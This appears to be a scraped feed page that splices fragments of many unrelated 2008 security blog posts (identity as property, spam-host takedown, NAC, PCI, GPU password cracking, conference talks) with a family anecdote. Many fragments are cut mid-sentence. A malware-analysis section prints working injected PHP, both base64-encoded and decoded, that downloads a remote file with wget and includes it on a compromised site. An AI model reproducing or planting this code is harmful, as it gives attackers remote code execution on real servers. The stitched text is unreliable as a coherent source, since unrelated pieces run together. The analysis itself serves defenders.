If you would like to apply for your press credentials please contact me at by Monday. Please include your SBN member blog URL to verify your membership. I am submitting the final list to the SC Mag folks Monday evening.
to someone else then they can do whatever they want with it. If data is property then they can buy sell license or give away my identity without my consent. This puts me at risk because I must rely on the good will of a third party to keep my identity secure.
But if personal information really were property then I should be able to permanently sell or “alienate,” it. But unfortunately. I can’t sell personal information like a car. If I sell my car and the new owner paints it purple or runs it into a tree it’s not my problem. But we all know that if I sell my personal information and the new owner “crashes” my identity. I suffer. Unlike all forms of property personal information is inherently inalienable. Unless you enter the witness protection program you’re stuck with your identity no matter how many times you sell it and no matter how many times it is crashed.
Intellectual Property law does not generally treat personal information as property. Most personal information such as names addresses phone numbers and social security numbers are facts. Facts are not copyrightable. You can’t patent personal information and it certainly isn’t a trade secret. In short nobody “owns” my name including myself. And if someone could “own” my name it would most logically be my parents since they created it. But my mom can’t copyright my date of birth and the government can’t patent my social security number. My phone number is not an AT&T trade secret nor is it mine.
like property and so it is treated as such. Like property personal information has value. Entire multi-billion dollar industries thrive on the sale and exchange of personal information. Next like any form of property personal information in databases can be shared sold licensed stolen or lost with remarkable efficiency. And unfortunately you don’t have any constitutional right of privacy when you give your personal data to a third party.
Some laws recognize that personal information has value. For example. United States election law requires candidates disclose the value of all in-kind campaign donations including databases of potential voters. Other federal and state statutes such as the Gramm-Leach-Bliley Act and the Sarbanes-Oxley Act require corporations to account for the fair market value of assets which may include customer data. Even tort law says that some forms of privacy come from a trademark ownership of one’s name and likeness. And breach notification laws seem to assert that companies which collect personal information “own” it.
But that isn’t the whole story. Unlike every other form of property you can’t alienate personal information (such as bank account numbers credit scores social security numbers or police reports) even if a third party creates it. Personal information is different from property since property is presumptively alienable.
In the Information Age you are not much more than “an electronic collage of bits of information a digital person composed in the collective computer networks of the world.” In other words a person may now be defined as just a few pieces of data. This data is your
Your Data Self is a collection of your credit report facebook page. Google results. Bank account numbers archived e-mails and an endless parade of other data. Your Data Self is a digital alter-ego with its own personality dispositions fallacies and mortality. Your Data Self also has the power to enter contracts grant access to your financial assets have surgery commit crimes or be kidnapped.
will. If someone makes your Data Self sign a contract you are bound by it. If your Data Self is convicted of a crime you can go to jail. If someone forces your Data Self to take out a loan you must repay it. If your Data Self has an operation you may no longer qualify for medical insurance. If your Data Self is abused stolen sold manipulated or forced to act against its will you suffer the consequences. In this sense. “Identity Theft” might be more descriptively defined as “Digital Kidnapping.” Identity Theft is when someone pretends to be you by “kidnapping” your Data Self doing something bad and you get blamed.
theories of personal information: First you have an alter-ego digital “identity” or Data Self; and second your Data Self is subject to theft and abuse like property.
Fortunately the 13th Amendment ended slavery and human muscle once required for agriculture and labor does not command the same economic premium in a post-industrial society. Instead a person’s economic value now lies in his access to financial assets and credit. Our Data Selves are easy to coerce and we are now worth more in bytes than in flesh and blood. As long as Data Selves are digital property new crimes similar to identity theft will continue to arise and our society runs the sinister risk of a new form of human trafficking: A type of Digital Slavery where third parties can own abuse and force Data Selves to act against their will.
499 U. S. 340. 363-64. 111 S. Ct. 1282. 1297 (1991) (Holding that an alphabetized collection of personal facts in a phone book is not copyrightable because 1. Facts are not copyrightable and 2. The phone book lacks minimally creative selection coordination and arrangement. “As a statutory matter. 17 U. S. C. § 101 does not afford protection from copying to a collection of facts that are selected coordinated and arranged in a way that utterly lacks originality.”) . 35 U. S. C. A. §§ 101-102. Facts in a database may qualify for trade secret protection under state law but only if the information meets stringent requirements and remains secret. 19 NO. 7
425 U. S. 435. 443-44 (1976) (Holding that bank records have no fourth amendment protection and are subject to government subpoena with no infringement of an individual’s rights). 2 U. S. C. A § 431(8)(a). “Tort” law is common- or judge-made law that allows people to sue others for doing bad things. For example the tort of Appropriation of Name or Likeness is when someone uses a person’s name or picture for financial gain:
§ 652C cmt a. (1977) (The Tort of Appropriation of Likeness gives the individual “exclusive use of his own identity in so far as it is represented by his name or likeness and in so far as the use may be of benefit to him or to others. Although the protection of his personal feelings against mental distress is an important factor leading to a recognition of the rule the right created by it is in the nature of a property right for the exercise of which an exclusive license may be given to a third person which will entitle the licensee to maintain an action to protect it.”); .
I get so busy with work stuff worrying about the economy who will win an election are we secure that I sometimes forget what is really important. What is really important is spending time with my family and watching my two little babies grow up to be boys. I was reminded of that again tonight. A friend gave us tickets to the Florida Panthers hockey game. It was last minute and the two boys and I ate dinner jumped in the car and headed down to the Bank Atlantic Center.
The Panthers do a great job putting on a show for the kids. Though the arena is less than half full they have all kinds of contests and other kid related promotions and activities. My boys really enjoy going to Panther games.
I on the other hand really enjoy going to anything with my two sons. It never fails that they do and say things that make me realize how fast they are growing up and how lucky I am to have them. Tonight when they sang the Star Spangled Banner instead of having to tell them to stand they both got right up. My youngest son Bradley took off his hat and held it over his heart. Watching this little 7 year old standing there at attention with his hat over his heart singing the words to the National Anthem. I was pretty close to tears.
After this a commercial on the scoreboard talked about going to a local college and getting an education so that you "can go places". My 9 year old son Landon looked at me and said. "Dad that is what I want to do. I want to go to college so I can be like you and go places." I was so touched that he would want to be like me. I had to explain to him that going places was more than just actually going to different places but that there was another meaning to it. I thought about it. I don't want him to have to go to different places but I sure as heck hope that he does "go places". But the simple way he said this which encompassed how he thinks about me was enough to make me realize how blessed I am to have these two boys.
So remember time marches on and the little ones don't stay little forever. If you are lucky enough to have kids cherish every day and moment you can spend with them. Before you know it they aren't little anymore.
The volume of junk e-mail sent worldwide dropped drastically today after a Web hosting firm identified by the computer security community as a major host of organizations allegedy engaged in spam activity was taken offline according to security firms that monitor spam distribution online.
While its gleaming state-of-the-art. 30-story office tower in downtown San Jose. Calif. hardly looks like the staging ground for what could be called a full-scale cyber crime offensive security experts have found that a relatively small firm at that location is home to servers that serve as a gateway for a significant portion of the world’s junk e-mail.
The servers are operated by McColo Corp. which these experts say has emerged as a major U. S hosting service for international firms and syndicates that are involved in everything from the remote management of millions of compromised computers to the sale of counterfeit pharmaceuticals and designer goods fake security products and child pornography via email.
But when two Internet providers cut off MoColo’s connectivity to the Internet security experts said. Immediately after McColo was unplugged security companies charted a precipitous drop in spam volumes worldwide. E-mail security firm IronPort said spam levels fell by roughly 66 percent as of Tuesday evening.
I will do my best to both tweet (twitter id: catalyst) from CSI and report on interesting talks/findings from the floor. I will also be taking a limited number of vendor meetings to learn more about the products and solutions that make it easier for people to protect information. Shoot me a note if there is a product you want me to check out and report back on.
Sometimes when you try to explain something you can't help but muddy the waters. That is exactly what happened to he wrote about endpoint based NAC in Network World. Hey I am not knocking Tim though. I get some of my best material from his column. Anyway in this weeks adventure Tim is seeking to compare the pros and cons of endpoint based NAC to other types of NAC technologies. He has the same old regular guest stars featured. Rob Whitley of Forrester. Ofir Arkin and a couple of special guest star NAC customers. I am not going to regurgitate Tim's entire article. Instead lets go to the
Tim the "theoretical" problem of trusting an endpoint to report on itself is more real than that. Ask Richard Stiennon if you have any questions. In fact this is a reason why some people choose not to go endpoint based NAC. However that is not the major downside to endpoint based NAC. The major downside is there is no guest access solution. What do you do if the endpoint does not have the agent installed and you can't make them install the agent. Saying that you than need a second type of NAC is not elegant as Rob Whitley says. In fact it is downright ugly. When you consider that guest or unmanaged access is the biggest driver in NAC that pretty much sinks the endpoint based NAC approach.
Guys if the only defense you have is IPS that is fine but lets not say that is an effective NAC solution for guests. You are bound by what the IPS can detect and it takes a lot of IPS boxes usually. Not a scalable model at all. Of course you could wait for McAfee to resurrect the Lockdown appliances. It didn't work before and it probably won't work now.
Now wouldn't it be great if there was one NAC solution that covered all of these bases from one management console? You bet. If you are looking for one that does that let me know or check out StillSecure Safe Access!
Chris Hoff inspired this with ; a framework/standard for exchanging network security objects and events. Its roots are in NAC (Network Access Control) although as there’s been very little adoption to date.
Since cloud computing is a crappy marketing term that can mean pretty much whatever you want. I won’t dig into the various permutations here. For this post I’ll be focusing on distributed services (
Down the road we’ll dig into these in more detail but any time we start distributing services and functionality over an open public network with no inherent security controls we need to focus on the design issues and reduce design flaws as early as possible. We can’t just look at this as a network problem- our authentication authorization information and service (layer 7) controls are likely even more important.
In Tippett's view that is a hypothesis and a hypothesis needs to be tested to determine its validity. These tests can be performed either by analyzing data or by conducting a controlled experiment.
In many cases. Tippett claims testing a hypothesis (we need more of product X) will show that the marginal benefits of deploying more (of the same) technology does not outweigh the marginal costs. For example patching once a day instead of once a month might be much more expensive than the costs that are averted by it. If that hypothesis is proven to be true patching once per month instead of once per day would be a colossal waste of resources. The costs would not outweight the benefits.
In an ideal risk-assessment scenario sufficient data is available to estimate such a risk (defined as: likelihood ∙ impact) before a decision must be made rather than in hindsight after a solution has been implemented.
Most organization lack the body of experience to be able to compute these risks at all or at least in a way that is statistically significant enough to be usable. Most organizations are unwilling (or unable) to design and execute an experiment and draw conclusions based on the outcome of those experiments.
Until sufficient reliable data becomes available (at reasonable costs) organizations will never be able to build their information security programs based on a formal risk management approach. When such data does become available (and it is starting to) the IT security landscape will change. Until then risk management will be predominantly something we talk about rather than practice.
Growing financial pressures unforeseen threats and a volatile and rapidly changing business landscape — apt descriptions for both the world economy and this years Worldwide Infrastructure Security Survey.
Arbor Networks once again has completed a survey of the largest ISPs and content providers around the world. Some 70 lead security engineers responded to 90 questions covering a spectrum of Internet backbone security threats and engineering challenges. This fourth annual survey covered the 12-month period from August 2007 through July 2008.
. - do any of these ring a bell? The back alleys of Silicon Valley are littered with the corpses of that couldn't. Google has beaten most of these names into the annals of history. Only Yahoo and Microsoft (with their deep pockets) still put up some token resistance to the Borg-Google collective. Why? Do we like the Google color schemes? Do the double "0s" get us. Do we like the idea of advertiser based searching? No. No and no. We use Google because more than any other search engine out there when we want to find something. Google finds it for us. The algorithms and intelligence Google uses results in what we are looking for. Forget Android. Google Apps. Google Maps and all of that other stuff we use Google because their search renders the most relevant results.
Could there by a new player on the horizon that that gives us more relevant results? Could there be a "riot" in the search arena? If you believe what the folks at say there very well could be. In an age of social networking this is a social search engine. OneRiot gives you search results not based upon how many links are there to that page. The results you get are based upon the popularity of those pages as measured by people on the net. This should result in links not to the wikipedia page but to pages that real people look at when looking for a particular keyword. This could be the key to breaking out of the collective. To paraphrase what. I have seen the future of Internet search and its name is OneRiot.
Besides the search OneRiot plays on its social media roots and has some really great. There are plug ins for my space (why no facebook guys?) twitter web slices for IE8 etc. Check them out. Also you can make their searches better by.
OneRiot is based in Boulder. Co and in full disclosure I have some friends who work there. But don't let that hold you back. Go check out OneRiot and see for yourself that there can be more to search than being another drone of the collective.
My brought to light an even more extreme example of the evolution of virtualization's mainstream adoption and focused on the implications that cloud computing brings to bear when addressing the PCI DSS.
I was disheartened to find that upon inquiring as to status of the formation of and participation in a virtualization-specific special interest group (SIG,) the SSC's email response to me was as follows:
Hello Christofer,Thank you for contacting the PCI Security Standards Council. At thistime there is currently no Virtualization SIG. The current SIGs arePre-Authorization and Wireless. Please let us know if you are interested in either of those groups. Regards,The PCI Security Standards Council-----Original Message-----From: Christofer Hoff [mailto:choff@packetfilter com]Sent: Wednesday. October 29. 2008 12:58 PMTo: PCI ParticipationSubject: Participation in the PCI DSS Virtualization SIG?How does one get involved in the PCI DSS Virtualization SIG?Thanks,Christofer Hoff
VMware the global leader in virtualization solutions from the desktop to the datacenter announced today that it is joining the PCI Security Standards Council. As a participating organization. VMware will work with the council to evolve the PCI Data Security Standard (DSS) and other payment card data protection standards. This will help those VMware customers in the retail industry who are required to meet these standards to remain compliant while leveraging VMware virtualization. VMware has also launched the an initiative to help educate merchants and auditors about how to achieve maintain and demonstrate compliance in virtual environments to meet a number of industry standards including the PCI DSS.
As a participating organization. VMware will now have access to the latest payment card security standards from the council be able to provide feedback on the standards and become part of a growing community that now includes more than 500 organizations. In an era of increasingly sophisticated attacks on systems adhering to the PCI DSS represents a significant aspect of an entity's protection against data criminals. By joining as a participating organization. VMware is adding its voice to the process.
"The PCI Security Standards Council is committed to helping everyone involved in the payment chain protect consumer payment data," said Bob Russo general manager of the PCI Security Standards Council. "By participating in the standards setting process. VMware demonstrates it is playing an active part in this important end goal."
This is a case where IDS is your friend- you need to be watching for DNS traffic floods that will indicate you are under attack. There are also commercial DNS solutions you can use with active protections but for some weird reason I hate the idea of paying for something that’s free reliable and widely available.
Using the nVidia GT260 graphics card the system could test roughly 10-thousand password hashes-per-second. A cheap quad-core CPU can only do about 1-thousand password hashes-per-second. This is not the 100-fold speed-up promised but it is an impressive 10-fold speed-up. I tried out some other processors as well. Intel has shipped a new extremely-mobile processor (intended for cell-phones) called the "Atom". It has roughly a tenth the CPU power of the desktop processor. A tested the MacBook Air. Its graphics accelerator is actually slower than the built-in processor. Its 9400m GPU only does 178 hashes-per-second but the Core 2 Duo could do around 400 hashes-per-second. Graphics cards work by having a lot of tiny/simple processors. Here is a breakdown of some typical processors:In theory the speed of the cracking software should correlate with the frequency multiplied by the number of cores. The card to get right now is probably the 9800 GX2. I just ordered one from for $274. It puts two chips together on a single card which should make it faster (as well as cheaper) than the GT260. I spent another $200 to get a system to go around it. Elcomsoft currently cannot handle different cards. Therefore when cracking software on a MacBook Pro (which has a 9400m and a 9600m) you won't be able to use both simultaneously.
Bartol - Framework for Software Assurance: Nadya’s presentation will provide an update on the Software Assurance Forum efforts to establish a comprehensive framework for software assurance (SwA) and security measurement. The Framework addresses measuring achievement of SwA goals and objectives within the context of individual projects programs or enterprises. It targets a variety of audiences including executives developers vendors suppliers and buyers. The Framework leverages existing measurement methodologies including Practical Software and System Measurement (PSM); CMMI Goal. Question. Indicator. Measure (GQ(I)M); NIST SP 800-55 Rev1; and ISO/IEC 27004 and identifies commonalities among the methodologies to help organizations integrate SwA measurement in their overall measurement efforts cost-effectively and as seamlessly as possible rather than establish a standalone SwA measurement effort within an organization. The presentation will provide an update on the SwA Forum Measurement Working Group work present the current version of the Framework and underlying measures development and implementation processes and propose example SwA measures applicable to a variety of SwA stakeholders. The presentation will update the group on the latest NIST and ISO standards on information security measurement that are being integrated into the Framework as the standards are being developed.
Hope - The Web Security Testing Cookbook: The Web Security Testing Cookbook (O’Reilly & Associates. October 2008) gives developers and testers the tools they need to make security testing a regular part of their development lifecycle. Its recipe style approach covers manual exploratory testing as well automated techniques that you can make part of your unit tests or regression cycle. The recipes cover the basics like observing messages between clients and servers to multi-phase tests that script the login and execution of web application features. This book complements many of the security texts in the market that tell you what a vulnerability is but not how to systematically test it day in and day out. Leverage the recipes in this book to add significant security coverage to your testing without adding significant time and cost to your effort.
Many security experts believe that employee username and passwords are passé and on the way out. Is that true? If so what is the alternative? This session discusses the different aspects of using strong authentication for internal users to systems and applications. It examines the technologies available the benefits/challenges of deploying these technologies where it’s been successful where it hasn’t the barriers of deployment and what we can do about it. The following topics will be covered: The options for strong authentication technologies for the enterprise; Pros/cons of the technologies and why; Challenges to deployment; Practical examples of deployment; Determine tactics and discussion points with the vendors; and Present a framework for managing strong authentication for internal users over the entire enterprise.
In my previous post titled "" I described the need for a new security model methodology and set of technologies in the virtualized and cloud computing realms built to deal with the dynamic and distributed nature of evolving computing:
This basically means that we should distribute the sampling detection and prevention functions across the entire networked ecosystem not just to dedicated security appliances; each of the end nodes should communicate using a standard signaling and telemetry protocol so that common threat vulnerability and effective disposition can be communicated up and downstream to one another and one or more management facilities.
Greg Ness from Infoblox reminded me in the comments of that post of something I was very excited about when it became news at InterOp this last April: the. IF-MAP is a standardized real-time publish/subscribe/search mechanism which utilizies a client/server. XML-based SOAP protocol to provide information about network security objects and events including their state and activity:
IF-MAP extends the TNC architecture to support standardized dynamic data interchange among a wide variety of networking and security components enabling customers to implement multi-vendor systems that provide coordinated defense-in-depth. Today's security systems – such as firewalls intrusion detection and prevention systems endpoint security systems data leak protection systems etc. – operate as "silos" with little or no ability to "see" what other systems are seeing or to share their understanding of network and device behavior.
This limits their ability to support coordinated defense-in-depth. In addition current NAC solutions are focused mainly on controlling network access and lack the ability to respond in real-time to post-admission changes in security posture or to provide visibility and access control enforcement for unmanaged endpoints. By extending TNC with IF-MAP the TCG is providing a standard-based means to address these issues and thereby enable more powerful flexible open network security systems.
I'm really interested in how many vendors outside of the NAC space are including IF-MAP in their roadmaps. While IF-MAP has potential in convential non-virtualized infrastructure. I see a tremendous need for it in our move to with virtualization and Cloud Computing. Integrating for example. IF-MAP with VM-Introspection capabilities (in VMsafe. XenAccess etc.) would be fantastic as you could tie the control planes of the hypervisors management infrastructure and provisioning/governance engines with that of security and compliance in near-time.
A recent analysis of a compromised web site by eSoft's Threat Prevention Team lead to the discovery of hidden links designed only to show up when viewed by web crawlers such as those used by Google. Microsoft and Yahoo. The website reviewed dancescape tv appears perfectly normal when viewed from standard browsers but some PHP code has been injected that gives a long series of links designed to bump the PageRank of certain sites when viewed by a crawler. The PHP code in question looks like this:
eval(base64_decode("aWYgKChlcmVnaSgiYm90IiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgidXJwIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSBvciBlcmVnaSgibXNuIiwgJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkpIHsgc3lzdGVtKCJ3Z2V0IC1PIC90bXAvZ2V0aW5jbC50eHQgaHR0cDovL3B1YmxpY3NudWRlLmNvbS90ZW1wL2luY2wudHh0Iik7aW5jbHVkZSgiL3RtcC9nZXRpbmNsLnR4dCIpOyB9"));
if ((eregi("bot". $_SERVER["HTTP_USER_AGENT"]) or eregi("urp". $_SERVER["HTTP_USER_AGENT"]) or eregi("msn". $_SERVER["HTTP_USER_AGENT"]))) { system("wget -O /tmp/getincl txt http://[redacted] com/temp/incl txt");include("/tmp/getincl txt"); }
Recently a friend passed along a tip from a dermatologist: Stop sipping through straws. The doctor said it was the number one cause of wrinkles. Even more recently at lunch one day my aunt relayed some info from her husband an orthodontist. He said that drinking through a straw prevents cavities and tooth decay since straws allow sugary beverages to bypass your teeth. When my aunt said this everybody around the table (six women) stuck straws in their drinks. But when I countered with the skincare side of the question my aunt was the first to pluck her straw right back out again.
It has been an interesting two weeks – thanks to a catastrophic failure on the bulk of my web servers – thanks to an unannounced dreamhost switch/migration that results in their setting all permissions incorrectly. It's a long and boring story – loaded with insights for anyone involved in technology and customer service. But we're fixed – and I'm back.
The last few weeks have been pretty amazing; we have traveled the country from Upstate. NY to Kansas City…. Seattle…. And then back "East" to Detroit. We leave here on Thursday and head to Ohio for two days before heading on to the DC Metro area. CompTIA is sponsoring a book signing and give-away at the CSI show – so look for more details.
Last week – before the blizzards closed down sections of I-90 — we stopped on Monday at Mount Rushmore – and the entire family was taken with the effort on multiple levels. I was drawn to the history of the presidents – and will be spending more time learning about the character of these men and the way they served themselves and their country. All very inspiring!!
(2) Create a community where anyone with an idea can share their approach in the pursuit of helping another. If today is your first day in security welcome - share what you have learned without fear.
As we set out to journey the country keep tabs on our schedule and opportunities to meet at or follow the progress of the book and speaking tour at. As always if you are on the way (or in the city we are heading) please contact me directly so we can meet. Our RV is our home and our home is always open to our friends.
I am also spending more time on twitter these days - and would love to engage in the conversation with you. You can learn more about twitter here: and "follow" and chat with me here:
I was reading the while stuck at the airport for several hours last Thursday. During my many hours of free time I overheard some IT executive discussing the difficulties of implementing data discovery and classification with his peers. I did not catch the name of the company and probably would not pass it along even if I had but the tired and whiny rant about their associated failures was not unique. Perhaps I was a bit testy about having to sit in an airport lobby for eight hours but all I could think was “What is wrong with you? If hackers can navigate your data center why can’t you?”
That’s where the RSA report just gelled my thoughts on the subject. If a small group quite literally a handful of hackers can use Torpig & BlaBla to steal hundreds of thousands of credit card numbers steal accounts and passwords install malicious software at multiple company sites … all without being provided credentials access rights or a specific map of your IT infrastructure … why can’t your company classify its own data and intellectual property assets? You would think that a company given a modest amount of resources could discover classify and categorize its own data. I mean if you paid someone full time to do it don’t you think you could get the job done?
“Data in motion made it difficult to track”: So what- the hacker tools are kept running and they never stopped scanning. Nor did they give up on the first try; rather they periodically modified their code to adapt for location and type of data and they were persistent. You should be too.
“Difficulty to classify the data” and “Can’t find stuff you know is there”: So what- hire better programmers. Pressure vendors for better tools. Can’t afford expensive software? There is open source code out there to start with; hackers can do it- so can you. There are at least a dozen programmatic ways to analyze data through content or even context and probably even more ways to traverse/crawl/inspect systems. If the application your company uses can find it so can you.
“Size of the project is difficult to manage”: So what- divide and conquer. Take a specific set of data you are worried about and start there. Compliance group breathing down your neck to meet XYZ regulation? Pick one category (customer accounts credit card data source code whatever. Tune your tools and policies (you didn’t really think you were going to get perfection out of the box did you?) address that problem and move on. If you are starting with an ISACA or Cobit framework and trying to map a comprehensive strategy stop making the problem more complex than it is. Hackers went for low hanging fruit- you should too.
“The results are not accurate”: So what- you’re not going to be 100% right all the time. The hackers aren’t either. Either accept 95-99% accuracy or try something different. Or maybe your policy is out of line with reality and needs to be reconsidered.
“Expensive” and “Takes too much in the way of resources”: No chance! If hackers can run malware for 18 months at TJX and related stores UNDETECTED then the methods used are not resource hogs nor did they invest that much money in the tools.
Forex Groups - Tips on Trading
Related article:
http://intabitinsop.blogspot.com/2008/11/spliced-feed-for-security-bloggers_13.html
comments | Add comment | Report as Spam
|
